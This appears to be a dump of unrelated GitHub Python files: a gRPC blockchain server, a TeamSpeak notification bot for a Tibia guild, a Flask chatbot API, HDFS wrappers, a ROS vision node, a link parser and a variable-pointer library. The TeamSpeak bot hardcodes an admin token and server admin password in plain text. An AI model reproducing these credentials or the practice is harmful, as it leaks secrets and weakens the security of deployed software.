timestamp='',\n baseFee=0, tx=[], hash='', signature='')\n\n tx = []\n\n for transaction in block_dict['tx']:\n tx.append(RPCTransaction(sender=transaction['sender'], recipient=transaction['recipient'],\n amount=transaction['amount'], fee=transaction['fee'], type=transaction['tx_type'],\n timestamp=transaction['timestamp'], hash=transaction['hash'],\n signature=transaction['signature']))\n\n return RPCBlock(index=block_dict['index'], previousHash=block_dict['previous_hash'],\n version=block_dict['version'], timestamp=str(block_dict['timestamp']),\n baseFee=block_dict['base_fee'], tx=tx, hash=block_dict['hash'],\n signature=block_dict['signature'])\n\n def getBlocks(self, request, context):\n \"\"\"Fetch blocks from the given values.\n\n :param request: Information about the request.\n :param context: Context of the request.\n\n :return: Blocks protocol-message.\n :rtype: :py:object:`blockchain_pb2.Blocks`\n \"\"\"\n\n # TODO -> Fetch the blocks that were requested\n\n blocks = []\n\n for req_block in request:\n if req_block.index:\n block_dict = fetch_block(req_block.index)\n\n elif req_block.timestamp:\n block_dict = fetch_block_from_timestamp(req_block.timestamp)\n\n elif req_block.hash and req_block.signature:\n block_dict = fetch_block_from_signature(req_block.signature, req_block.hash)\n\n # Check if fetch was successful\n if not block_dict:\n blocks.append(RPCBlock(index=0, previousHash='', version='', timestamp='',\n baseFee=0, tx=[], hash='', signature=''))\n\n tx = []\n\n for transaction in block_dict['tx']:\n tx.append(RPCTransaction(sender=transaction['sender'], recipient=transaction['recipient'],\n amount=transaction['amount'], fee=transaction['fee'],\n type=transaction['tx_type'],\n timestamp=transaction['timestamp'], hash=transaction['hash'],\n signature=transaction['signature']))\n\n blocks.append(RPCBlock(index=block_dict['index'], previousHash=block_dict['previous_hash'],\n version=block_dict['version'], timestamp=str(block_dict['timestamp']),\n baseFee=block_dict['base_fee'], tx=tx, hash=block_dict['hash'],\n 
signature=block_dict['signature']))\n\n return Blocks(blocks=blocks)\n\n def getTransaction(self, request, context):\n \"\"\"Fetch transaction from the given values.\n\n :param request: Information about the request.\n :param context: Context of the request.\n\n :return: Transaction protocol-message.\n :rtype: :py:object:`blockchain_pb2.Transaction`\n \"\"\"\n\n # TODO -> Fetch transaction that was requested\n\n return RPCTransaction(sender='sdf', recipient='sdwf', amount=12, fee=23, type='tx', timestamp='1234',\n hash='123231wef', signature='asdf')\n\n def getTransactions(self, request, context):\n \"\"\"Fetch transactions from the given values.\n\n :param request: Information about the request.\n :param context: Context of the request.\n\n :return: Transactions protocol-message.\n :rtype: :py:object:`blockchain_pb2.Transactions`\n \"\"\"\n\n # TODO -> Fetch transactions that were requested\n\n return Transactions(tx=[RPCTransaction(sender='sdf', recipient='sdwf', amount=12, fee=23, type='tx',\n timestamp='1234', hash='123231wef', signature='asdf'),\n RPCTransaction(sender='sdf', recipient='sdwf',\n amount=12, fee=23, type='tx', timestamp='1234', hash='123231wef',\n signature='asdf')])\n\n def addTransaction(self, request, context):\n # Recreate the transaction\n tx = Transaction('', '', 0)\n tx.from_dict({\n 'sender': request.sender,\n 'recipient': request.recipient,\n\n 'amount': request.amount,\n 'fee': request.fee,\n\n 'type': request.type,\n 'timestamp': request.timestamp,\n\n 'hash': request.hash,\n 'signature': request.signature\n })\n\n # Put it on the processor queue\n input_queue.put({'type': 'tx', 'data': tx})\n\n return Success(success=True)\n\n def addTransactions(self, request, context):\n # Go through all provided transactions\n for transaction in request.transactions:\n # Recreate the transaction\n tx = Transaction('', '', 0)\n tx.from_dict({\n 'sender': transaction.sender,\n 'recipient': transaction.recipient,\n\n 'amount': transaction.amount,\n 'fee': transaction.fee,\n\n 'type': transaction.type,\n 'timestamp': transaction.timestamp,\n\n 'hash': transaction.hash,\n 'signature': transaction.signature\n })\n\n # Put it on the processor queue\n input_queue.put({'type': 'tx', 'data': tx})\n\n return Success(success=True)\n\n def getBaseFee(self, request, context):\n return BaseFee(base_fee=self.blockchain.last_blocks[0].base_fee)\n\n\nclass WalletListener(WalletServicer):\n def __init__(self, blockchain, db_q=None):\n \"\"\"Initialize the required values.\n\n :param blockchain: Chain to fetch from\n :type blockchain: :py:class:`blockchain.Blockchain`\n \"\"\"\n self.blockchain = blockchain\n\n self.db_q = db_q\n\n def getCoins(self, request, context):\n coins = Wallet.coins(request.public_key, self.blockchain)\n\n # Check if the coins were fetched correctly\n if not coins:\n return WalletResponse(amount=-1)\n\n return WalletResponse(amount=coins)\n\n def getStake(self, request, context):\n stake = Wallet.stake(request.public_key, self.blockchain)\n\n # Check if the stake was fetched correctly\n if not stake:\n return WalletResponse(amount=-1)\n\n return WalletResponse(amount=stake)\n\n def getScore(self, request, context):\n score = Wallet.score(request.public_key, self.blockchain)\n\n # Check if the score was fetched correctly\n if not score:\n return WalletResponse(amount=-1)\n\n return WalletResponse(amount=score)\n\n
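One caveat about the `if not coins:` pattern used by the wallet getters above: a legitimate balance, stake, or score of 0 is falsy, so it would be reported as the -1 error value. Assuming the Wallet helpers return None on failure (an assumption on my part; the Wallet class is not shown here), an explicit None check keeps zero balances intact. A sketch of the same method with that change:

def getCoins(self, request, context):
    coins = Wallet.coins(request.public_key, self.blockchain)
    # Only a failed lookup (None) maps to the error value; 0 is a valid balance
    if coins is None:
        return WalletResponse(amount=-1)
    return WalletResponse(amount=coins)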
def getClaims(self, request, context):\n claims = Wallet.claims(request.public_key, self.blockchain)\n\n # Check if the claims were fetched correctly\n if not claims:\n return WalletResponse(amount=-1)\n\n return WalletResponse(amount=claims)\n\n\nclass RPCServer():\n def __init__(self, blockchain, processor_queue, port=None, start=False, db_q=None):\n \"\"\"Initialize the server-values.\n\n :param blockchain: Chain to fetch from\n :type blockchain: :py:class:`blockchain.Blockchain`\n :param port: Port to listen on.\n :type port: int\n :param start: Start automatically or not\n :type start: bool\n \"\"\"\n self.port = port if port else RPC_PORT\n self.blockchain = blockchain\n\n global input_queue\n input_queue = processor_queue\n\n self.server = None\n\n self.db_q = db_q\n\n if start:\n self.start()\n\n def start(self):\n \"\"\"Starts the rpc server.\n\n :return: Status if server start was successful.\n :rtype: bool\n \"\"\"\n if self.server:\n return False\n\n self.server = grpc_server(ThreadPoolExecutor(max_workers=1))\n\n add_blockchain(BlockchainListener(self.blockchain, db_q=self.db_q), self.server)\n add_wallet(WalletListener(self.blockchain, db_q=self.db_q), self.server)\n\n self.server.add_insecure_port(f'[::]:{self.port}')\n self.server.start()\n\n return True\n\n def stop(self):\n \"\"\"Stops the rpc server.\n\n :return: Status if stop was successful.\n :rtype: bool\n \"\"\"\n if not self.server:\n return False\n\n self.server.stop(0)\n self.server = None\n\n return True\n\n def restart(self):\n \"\"\"Restarts the rpc server.\n\n :return: Status if restart was successful.\n :rtype: bool\n \"\"\"\n success = self.stop()\n\n if not success:\n return False\n\n success = self.start()\n\n if not success:\n return False\n\n return True\n","repo_name":"advaced/advaced","sub_path":"rpc/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":11176,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"}
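For completeness, a sketch of what a client of the RPCServer above could look like. The BlockchainStub class name follows the standard grpcio code-generation convention for the blockchain_pb2_grpc module imported in the record (service Blockchain -> BlockchainStub); the port value and the request message name are stand-ins, since neither RPC_PORT's value nor the .proto file is shown here:

import grpc
from blockchain_pb2_grpc import BlockchainStub

# 50051 is a stand-in for the project's RPC_PORT constant
channel = grpc.insecure_channel('localhost:50051')
stub = BlockchainStub(channel)
# Service methods mirror the servicer above (getBlock, getBaseFee, ...).
# Their request message types live in the project's .proto file, so the
# call below names a hypothetical message:
# block = stub.getBlock(blockchain_pb2.BlockRequest(index=1))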
 +{"seq_id":"5649678679","text":"from ts3 import TS3Server\r\nfrom time import sleep\r\nimport time\r\nimport tibia\r\n\r\n\r\n# ----------------------- CONFIGURATION ---------------------------------\r\n\r\n# test list of players to check for new deaths, ['player+name', 'last death'] (build a database for this)\r\nplayerlist = [['Deku Panzon', ''], ['Mouzsack', '2017-10-21 01:20:58.000000'], ['Binus+Belis', '2017-10-21 00:40:01.000000'], ['Old Bodybuilder', ''],\r\n ['Biger', '2017-10-21 00:37:20.000000'], ['Brisadus', ''], ['Edio Lavis', ''], ['Jazir', ''], ['Floki Svein', ''],\r\n ['Kolerah', ''], ['Zikiz Surf', ''], ['Garrero Tank', ''], ['Lady Lufty', ''], ['Adethor ade', ''], ['Leozin Aguerrido', ''],\r\n ['Shaymin Prasete', ''], ['Hintz Mixall', ''], ['Pedrox da Ricaria', ''], ['Angoro', ''], ['Dgzin Feat', ''], ['Wix da Ricaria', ''],\r\n ['Arroto de bolovo', ''], ['Wesilei+On+Honbra', ''], ['Ohnivek', ''], ['Mage+Brisa', '']]\r\n\r\n# list of mage makers\r\nmaker_list = ['roque healer', 'king feliipe', 'wizard solo', 'soster mito', 'brax pierce', 'combatente de satan', 'miguel felomenal', 'foxx boladao', 'mexxtre dos magos']\r\n\r\ntoken = 'wdskUKgDKf1bxXUjApjgqBc2wiJiEb1+bLSd6y+a' # admin-privilege token\r\nt_makerCheck = 1200 # time between each mass poke about online makers, in seconds\r\nt_connection = 300 # time before reconnecting to the ts3 server\r\nmakerCheck = time.time() # variable used to track the time between maker mass pokes\r\npreviousOnline = 0 # stores the last count of online makers\r\nc_renew_time = time.time() # tracks the time since the ts3 connection was last renewed\r\n\r\n# ---------------- END OF CONFIGURATION ---------------------------------\r\n\r\nserver = TS3Server('127.0.0.1', 10011, 1)\r\nif server.login('serveradmin', 'pKEZF0Ct'):\r\n print('Server connection initialized...')\r\n\r\nclients = server.clientlist()\r\n\r\ndef massPoke(msg, client_list):\r\n for i in client_list:\r\n server.clientpoke(client_list.get(i)['clid'], msg)\r\n\r\n\r\nwhile True:\r\n \r\n makers = tibia.checkOnlineMakers(maker_list)\r\n\r\n# renew the ts3 connection every 5 minutes...\r\n if (time.time() - c_renew_time) > t_connection:\r\n server = TS3Server('127.0.0.1', 10011, 1)\r\n if server.login('serveradmin', 'pKEZF0Ct'):\r\n clients = server.clientlist()\r\n c_renew_time = time.time()\r\n print('Server connection stable...')\r\n\r\n# Check online makers; only refresh every 5 minutes, except when another maker enters the game.\r\n# Example: the last poke happened 2 minutes ago with 5 makers online; the next poke would only run after 5 minutes,\r\n# but if 1 more player logs in, the poke goes out for 6 makers (configurable; larger increments can be added,\r\n# e.g. elif (makers > (previousOnline+2)) to only warn when 3 or more makers enter, relative to the previous online count).\r\n since = time.time() - makerCheck\r\n if (makers > 3) and (since > t_makerCheck):\r\n makerCheck = time.time()\r\n massPoke(\"[color=red][b]{0} MAKERS ONLINE[/b][/color]\".format(makers), clients)\r\n previousOnline = makers\r\n elif (makers > previousOnline):\r\n massPoke(\"[color=red][b]{0} MAKERS ONLINE[/b][/color]\".format(makers), clients)\r\n previousOnline = makers\r\n\r\n\r\n# This block constantly checks the players defined in a list or database,\r\n# recording all of their deaths and sending a massPoke().\r\n# Filters could be added to avoid pokes for enemies who die to pvp-arena monsters (Pit Reaver, Pit Blackling, Death, etc).\r\n\r\n for k, i in enumerate(playerlist):\r\n lastDeath = tibia.checkLastDeath(i[0])\r\n if tibia.checkNewDeath(i) and int(lastDeath['level']) > 5:\r\n print(\"ENEMY KILLED: {0} {1} at level {2}\".format(i[0].replace(\"+\", \" \"), lastDeath['reason'], lastDeath['level']))\r\n clients = server.clientlist()\r\n massPoke(\"[color=red]ENEMY KILLED: {0} at level {1}[/color]\".format(i[0].replace(\"+\", \" \"), lastDeath['level']), clients)\r\n playerlist[k][1] = lastDeath['date']['date']","repo_name":"DevonWC/ts3-bot","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"21598734413","text":"import flask\nimport bernie\n\napp = flask.Flask(__name__, static_url_path='/static/')\n\nMODEL_FILENAME = 'models/bern.iter999.h5'\nTEXT_FILENAME = 'bernie_corpus.txt'\n\nimport train_bernie\ntext = train_bernie.read_text_from_file(TEXT_FILENAME)\nchar_indices, indices_char = bernie.make_char_lookup_table(text)\nmodel = bernie.load_model(char_indices)\n\n\"\"\"\n@app.route('/visualization')\ndef visualization():\n weights = open('/tmp/visualization.png').read()\n return flask.Response(weights, mimetype='image/png')\n\"\"\"\n\n@app.route('/ask_question')\ndef ask_question():\n question = flask.request.args.get('question') + '. 
'\n print('Received question: {}'.format(question))\n answer = bernie.ask_bernie(model, question, char_indices, indices_char)\n print('Returning answer: {}'.format(answer))\n return answer\n\n@app.route('/')\ndef route_index():\n return app.send_static_file('bernie.html')\n\n@app.route('/')\ndef send_static_file(path):\n return flask.send_from_directory('static', path)\n\nif __name__ == '__main__':\n app.run('0.0.0.0', port=8000, use_reloader=False)\n","repo_name":"manceps/tfw","sub_path":"examples/berniebot/webapi.py","file_name":"webapi.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"29579996568","text":"import ast\nimport inspect\nimport pathlib\nimport warnings\nfrom contextlib import suppress\nfrom types import FrameType as Frame\nfrom typing import Any, Callable, Dict, List, Optional, TypeVar, Union\n\nfrom _pointers import force_update_locals\n\nfrom .base_pointers import BasePointer\nfrom .exceptions import NullPointerError, VariableLifetimeError\nfrom .util import NULL, Nullable, handle\n\nT = TypeVar(\"T\")\n\nif hasattr(ast, \"NamedExpr\"):\n NamedExpr = ast.NamedExpr # type: ignore\nelse:\n\n class NamedExpr: # type: ignore\n ...\n\n\ndef _remove_indent(source: str) -> str:\n result: List[str] = []\n split = source.split(\"\\n\")\n\n if (not split[0].startswith(\" \")) and (not split[0].startswith(\"\\t\")):\n return source\n\n last_indent_size: Optional[int] = None\n\n for line in split:\n if (not line.startswith(\" \")) and (not line.startswith(\"\\t\")):\n break\n\n index = 0\n\n for i in line:\n if i not in {\" \", \"\\t\"}:\n break\n index += 1\n\n if (index != last_indent_size) and last_indent_size:\n result.append(line[last_indent_size:])\n else:\n result.append(line[index:])\n last_indent_size = index\n\n return \"\\n\".join(result)\n\n\nclass VarPointer(BasePointer[T]):\n def __init__(self, name: str, frame: Frame) -> None:\n self.name: Optional[str] = name\n self._frame = frame\n self._address = id(~self)\n\n def _get_scope(self) -> Dict[str, Any]:\n if not self.name:\n raise NullPointerError(\"pointer is NULL\")\n\n frame = self._frame\n\n if self.name in frame.f_globals:\n return frame.f_globals\n\n if self.name in frame.f_locals:\n return frame.f_locals\n\n raise VariableLifetimeError(f'variable \"{self.name}\" no longer exists')\n\n @handle\n def move(\n self,\n target: Union[T, \"BasePointer[T]\"],\n *,\n unsafe: bool = False,\n ) -> None:\n if unsafe:\n warnings.warn(\"unsafe has no effect on variable pointers\")\n\n if not self.name:\n raise NullPointerError(\"pointer is NULL\")\n\n scope = self._get_scope()\n\n if (scope is self._frame.f_locals) and (\n self._frame.f_locals is not self._frame.f_globals\n ):\n force_update_locals(\n self._frame,\n self.name,\n (\n ~target\n if isinstance(\n target,\n BasePointer,\n )\n else target\n ),\n )\n else:\n scope[self.name] = (\n ~target\n if isinstance(\n target,\n BasePointer,\n )\n else target\n )\n\n @property\n def address(self) -> Optional[int]:\n return self._address\n\n def _cleanup(self) -> None:\n pass\n\n def __repr__(self) -> str:\n return f\"VarPointer(name={self.name!r})\"\n\n def dereference(self) -> T:\n if not self.name:\n raise NullPointerError(\"pointer is NULL\")\n\n return self._get_scope()[self.name]\n\n def assign(self, value: Nullable[Union[\"VarPointer[T]\", T]]) -> None:\n if value is NULL:\n self._address = 0\n self.name = None\n return\n\n frame = inspect.currentframe()\n assert 
frame\n assert frame.f_back\n\n if frame.f_back.f_globals == frame.f_globals:\n # it was called by __irshift__\n back = frame.f_back.f_back\n assert back\n txt = pathlib.Path(back.f_code.co_filename).read_text()\n expr = _remove_indent(\n \"\\n\".join(txt.split(\"\\n\")[back.f_lineno - 1:]),\n )\n caller_scope = {**back.f_globals, **back.f_locals}\n augassign: Optional[ast.AugAssign] = None\n\n for node in ast.parse(expr).body:\n if (\n isinstance(node, ast.AugAssign)\n and isinstance(node.op, ast.RShift)\n and isinstance(node.target, ast.Name)\n ):\n with suppress(KeyError):\n if caller_scope[node.target.id] is self:\n augassign = node\n break\n\n if not augassign:\n raise ValueError(\"failed to find ast.AugAssign\")\n\n if not isinstance(augassign.value, ast.Name):\n raise TypeError(f\"{value} does not have a variable name\")\n\n self.name = augassign.value.id\n self._address = id(value)\n return\n\n self.name = _find_name(frame.f_back, value, self.assign)\n self._address = id(value)\n\n def __irshift__(\n self,\n value: Nullable[Union[\"VarPointer[T]\", T]],\n ):\n self.assign(value)\n return self\n\n\ndef _check_call_expr(\n node: ast.AST, caller_scope: dict, caller: Callable[..., Any]\n) -> Optional[ast.Call]:\n if isinstance(node, ast.Call):\n if isinstance(node.func, ast.Name):\n with suppress(KeyError):\n call_func = caller_scope[node.func.id]\n\n if call_func == caller:\n return node\n elif isinstance(node.func, ast.Attribute) and isinstance(\n node.func.value, ast.Name\n ):\n with suppress(KeyError):\n obj = caller_scope[node.func.value.id]\n attr = getattr(obj, node.func.attr, None)\n\n if attr and (attr == caller):\n return node\n return None\n\n\ndef _find_call_expr(\n node: ast.AST, caller_scope: dict, caller: Callable[..., Any]\n) -> Optional[ast.Call]:\n if isinstance(node, ast.Assign): # ptr = to_var_ptr(my_variable)\n node = node.value\n elif isinstance(node, ast.Expr): # to_var_ptr(my_variable)\n node = node.value\n\n if hasattr(node, \"value\"):\n nd = _find_call_expr(node.value, caller_scope, caller) # type: ignore\n if nd:\n return nd\n\n if hasattr(node, \"args\"):\n args = node.args # type: ignore\n if not isinstance(args, ast.arguments):\n for expr in args:\n nd = _find_call_expr(expr, caller_scope, caller)\n if nd:\n return nd\n return _check_call_expr(node, caller_scope, caller)\n\n\ndef _find_name(frame: Frame, value: Any, caller: Callable[..., Any]) -> str:\n txt = pathlib.Path(frame.f_code.co_filename).read_text()\n expr = _remove_indent(\"\\n\".join(txt.split(\"\\n\")[frame.f_lineno - 1:]))\n caller_scope = {**frame.f_globals, **frame.f_locals}\n call_expr: Optional[ast.Call] = None\n\n for node in ast.parse(expr).body:\n call_expr = _find_call_expr(node, caller_scope, caller)\n\n if call_expr:\n break\n\n if not call_expr:\n raise ValueError(\"failed to find ast.Call\")\n\n param = call_expr.args[0]\n\n if not isinstance(param, (ast.Name, NamedExpr)):\n raise TypeError(f\"{value} does not have a variable name\")\n\n name_expr = param if isinstance(param, ast.Name) else param.target\n\n if not isinstance(name_expr, ast.Name):\n raise TypeError(f\"{ast.dump(name_expr)} is not a name\")\n\n return name_expr.id\n\n\ndef to_var_ptr(value: T) -> VarPointer[T]:\n frame = inspect.currentframe()\n assert frame\n assert frame.f_back\n name = _find_name(frame.f_back, value, to_var_ptr)\n return VarPointer(name, 
frame.f_back)\n","repo_name":"ZeroIntensity/pointers.py","sub_path":"src/pointers/var_pointer.py","file_name":"var_pointer.py","file_ext":"py","file_size_in_byte":7555,"program_lang":"python","lang":"en","doc_type":"code","stars":848,"dataset":"github-code","pt":"35"} +{"seq_id":"18096327686","text":"# just a quick demo of how we can use \"\", '' & '''.\r\nsubject = 'very responsive'\r\nprint(subject)\r\n\r\n# what to do if we have something like john's laptop is good.\r\nresponse = \"john's laptop is good\" # we use \"\" to avoid errors\r\nprint(response)\r\n\r\n# what to do if we need to say john said,\"my laptop is working fine\"\r\nresponse = 'john said,\"my laptop is working fine.\"'\r\nprint(response)\r\n\r\n# in an email we need to use triple quotes to define the message, i.e. '''\r\nemail_message = '''\r\nhi sir,\r\nPlease note that all incoming mails will be forwarded to mail@jfc.com.\r\n\r\nThanks.\r\nkind regards,\r\nnick.\r\n'''\r\nprint(email_message)\r\n\r\n# to get the character at an index (or a slice) we use square brackets\r\nsubject = 'very responsive' # indexing starts at 0 from the front, while -1 is the last character\r\nprint(subject[0:-1])\r\n","repo_name":"nickpeters741/starterhelllo","sub_path":"strings/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4596828995","text":"from __future__ import print_function, unicode_literals\nimport logging\nimport subprocess\n\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %('\n 'message)s')\n\n\ndef get(remote, local):\n \"\"\"Get from HDFS\"\"\"\n logging.debug(\"Getting %s from HDFS and placing locally at: %s\", remote,\n local)\n subprocess.call(['hadoop', 'fs', '-get', '{}'.format(\n remote), '{}'.format(local)])\n\n\ndef put(local, remote):\n \"\"\"Put into HDFS\"\"\"\n logging.debug(\"Putting %s into HDFS at: %s\", local, remote)\n subprocess.call(['hadoop', 'fs', '-put', '{}'.format(\n local), '{}'.format(remote)])\n\n\ndef mkdir_p(path):\n \"\"\"Make directory with parents if they don't exist\"\"\"\n logging.debug(\"Creating %s on HDFS\", path)\n subprocess.call(['hadoop', 'fs', '-mkdir', '-p', '{}'.format(path)])\n\n\ndef rm_r(path):\n \"\"\"Remove recursively\"\"\"\n logging.debug(\"Removing recursively: %s\", path)\n subprocess.call(['hadoop', 'fs', '-rm', '-r', '{}'.format(path)])\n","repo_name":"michaeltneylon/lofn","sub_path":"lofn/base/hdfs.py","file_name":"hdfs.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"3510760325","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nInput Parser for salted\n~~~~~~~~~~~~~~~~~~~~~\nSource: https://github.com/RuedigerVoigt/salted\n(c) 2020-2021 Rüdiger Voigt\nReleased under the Apache License 2.0\n\"\"\"\n\nimport re\n\nfrom bs4 import BeautifulSoup # type: ignore\nfrom pybtex.database import parse_string # type: ignore\n# a future version of pybtex might get type hints, see:\n# https://bitbucket.org/pybtex-devs/pybtex/issues/141/type-annotations\n\n\nclass Parser():\n \"Methods to extract hyperlinks and mail addresses from different formats.\"\n\n def __init__(self) -> None:\n\n # Specification: https://www.ctan.org/pkg/hyperref\n self.pattern_latex_url = re.compile(\n r\"\\\\url\\{(?P<url>[^{]*?)\\}\",\n flags=re.MULTILINE | re.IGNORECASE)\n self.pattern_latex_href = re.compile(\n r\"\\\\href(\\[.*\\]){0,1}\\{(?P<url>[^}]*)\\}\\{(?P<text>[^}]*?)\\}\",\n flags=re.MULTILINE | 
re.IGNORECASE)\n\n # Specs:\n # https://pandoc.org/MANUAL.html\n # https://daringfireball.net/projects/markdown/syntax\n # https://github.github.com/gfm/\n self.pattern_md_link = re.compile(\n r\"\\[(?P<text>[^\\[]*)\\]\\((?P<url>[^\\)]*?)[\\s\\)]+\",\n flags=re.MULTILINE | re.IGNORECASE)\n self.pattern_md_link_pointy = re.compile(\n r\"<(?P<url>[^>]*?)>\",\n flags=re.MULTILINE | re.IGNORECASE)\n\n @staticmethod\n def extract_links_from_html(file_content: str) -> list:\n \"\"\"Extract all links from a HTML file.\"\"\"\n matches = []\n soup = BeautifulSoup(file_content, 'html.parser')\n for link in soup.find_all('a'):\n matches.append([link.get('href'), link.text])\n return matches\n\n def extract_links_from_markdown(self,\n file_content: str) -> list:\n \"\"\"Extract all links from a Markdown file.\n Returns a list of lists: [[url, linktext], [url, linktext]]\"\"\"\n matches = []\n md_links_in_file = re.findall(self.pattern_md_link, file_content)\n for match in md_links_in_file:\n matches.append([match[1], match[0]])\n pointy_links_in_file = re.findall(self.pattern_md_link_pointy,\n file_content)\n for url in pointy_links_in_file:\n matches.append([url, url])\n return matches\n\n def extract_links_from_tex(self,\n file_content: str) -> list:\n \"\"\"Extract all links from a .tex file.\n Returns a list of lists: [[url, linktext], [url, linktext]]\"\"\"\n matches = []\n # extract class \\href{url}{text} links\n href_in_file = re.findall(self.pattern_latex_href, file_content)\n for match in href_in_file:\n # The RegEx returns the optional element as the first element.\n # (Empty, but still present in the result if it is not in the string.)\n matches.append([match[1], match[2]])\n # extract \\url{url} links\n url_in_file = re.findall(self.pattern_latex_url, file_content)\n for url in url_in_file:\n matches.append([url, url])\n return matches\n\n @staticmethod\n def extract_links_from_bib(file_content: str) -> list:\n \"\"\"Extract all URLs and DOIs from a .bib file.\n Returns a list of two lists:\n * The first one in the format [[url, text], [url, text]] - with text\n being the key-value of the bibtex-entry and the respective field.\n * The second one in the format [[doi, text], [doi, text]] - text\n being the key-value of the bibtex-entry and the field.\"\"\"\n url_list = []\n doi_list = []\n bib_data = parse_string(file_content, bib_format='bibtex')\n for entry in bib_data.entries:\n # Neither the URL, nor the DOI field is required by BiBTeX.\n # pybtex throws a KeyError if the field does not exist.\n try:\n url = bib_data.entries[entry].fields['Url']\n url_list.append([url, f\"Key: {entry}, Field: Url\"])\n except KeyError:\n pass\n\n try:\n doi = bib_data.entries[entry].fields['Doi']\n doi_list.append([doi.strip(), f\"Key: {entry}, Field: DOI\"])\n except KeyError:\n pass\n\n return [url_list, doi_list]\n\n @staticmethod\n def extract_mails_from_mailto(mailto_link: str) -> None:\n \"\"\"A single mailto link can contain *multiple* mail addresses.\n Extract them and return them as a list.\"\"\"\n mailto_link = mailto_link[7:] # cut off the mailto: part\n # TO DO\n pass\n","repo_name":"RuedigerVoigt/salted","sub_path":"salted/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"75235259307","text":"#!/usr/bin/python3\nimport rospy\nimport cv2\nimport numpy as np\n\nfrom sensor_msgs.msg import Image\nfrom geometry_msgs.msg import Point\nfrom std_msgs.msg import String\nfrom cv_bridge import 
CvBridge, CvBridgeError\n\nfrom sky_detectors import BlockDetector\n\nfrom cam_config import CAMERA_MATRIX, DISTORTION_MATRIX, CAMERA_FOV, CAMERA_RES\n\n\nclass BlockROS:\n    def __init__(self):\n        #Sim ranges\n        lower_mask = np.array([110, 50, 50]) \n        upper_mask = np.array([130, 255, 255])\n\n        #Drone ranges\n        #lower_mask = np.array([[90,50,50]])\n        #upper_mask = np.array([105, 255, 255])\n\n        # Create the block detector object\n        self.detector = BlockDetector(CAMERA_RES, lower_mask, upper_mask)\n\n        # State of the detection\n        self.type = \"\"\n\n        # ROS node\n        rospy.init_node('sky_vision_block', anonymous=False)\n\n        # Bridge ros-opencv\n        self.bridge_object = CvBridge()\n\n        # Post detection image publisher\n        self.newimg_pub = rospy.Publisher('/sky_vision/down_cam/img_result', Image, queue_size=10)\n        self.cam = Image()\n\n        # Post detection pose info publisher\n        self.pose_pub = rospy.Publisher('/sky_vision/down_cam/block/pose', Point, queue_size=1)\n        self.pose = Point()\n\n        try:\n            print(\"\\nCreating block subscribers...\")\n            rospy.Subscriber('/sky_vision/down_cam/img_raw', Image, self.camera_callback)\n            rospy.Subscriber('/sky_vision/down_cam/type', String, self.type_callback)\n            print(\"Block Subscribers up!\")\n        except:\n            print('Error trying to create subscribers!')\n\n        self.frame = None\n\n        rospy.spin()\n\n\n    def type_callback(self, message):\n\n        # Get current state\n        self.type = message.data\n\n\n    #-- Get new frame\n    def camera_callback(self, message):\n        \n        if self.type == \"block\":\n            #print(\"UIUIUIUI\")\n            # Bridge from ROS to CV\n            cam = self.bridge_object.imgmsg_to_cv2(message, \"bgr8\")\n            self.frame = cam\n\n            target = self.detector.mapCircles(self.frame)\n\n            if target is not None:\n                #print(\"AAAAAAAAAAAAAAAAAAAAAAAAA\")\n                (cx, cy), (w, h), angle = target\n                draw_img = cv2.circle(self.frame, (int(cx), int(cy)), 5, (0, 0, 255), -1)\n                # Publish image with target identified\n                ros_img = self.bridge_object.cv2_to_imgmsg(draw_img, 'bgr8')\n                self.newimg_pub.publish(ros_img)\n\n                self.pose.x = cx\n                self.pose.y = cy\n                self.pose.z = 0\n\n                # Publish target pose info\n                self.pose_pub.publish(self.pose)\n\n\npackage = BlockROS()","repo_name":"SkyRats/sky_vision","sub_path":"src/block2ros.py","file_name":"block2ros.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"24703782758","text":"N = int(input())\ndict = {}\n\nfor i in range(N) :\n    name, state = input().split()\n    if state == \"enter\" :\n        dict[name] = state\n    \n    else :\n        del dict[name]\n\ndict = sorted(dict.keys(), reverse=True)\n\nfor j in dict :\n    print(j)","repo_name":"Sonjieun2/AlgorithmStudy","sub_path":"Baekjoon/2023_7/0704/7785.py","file_name":"7785.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"70025192428","text":"# Implement a list shuffling algorithm.\r\n\r\nfrom random import randint, shuffle\r\n\r\nlst = [i for i in range(10)]\r\n\r\nfor i in range(len(lst)):\r\n    temp = lst[i]\r\n    r = randint(0, len(lst) - 1)\r\n    lst[i] = lst[r]\r\n    lst[r] = temp\r\nprint(lst)","repo_name":"YuriyOzornin/PythonExamples","sub_path":"ex10.py","file_name":"ex10.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"29445319172","text":"#!python\n\nimport sys\nsys.path.insert(0, '..')\nimport hexomap\nfrom hexomap import reduction\n\nstartIdx = 
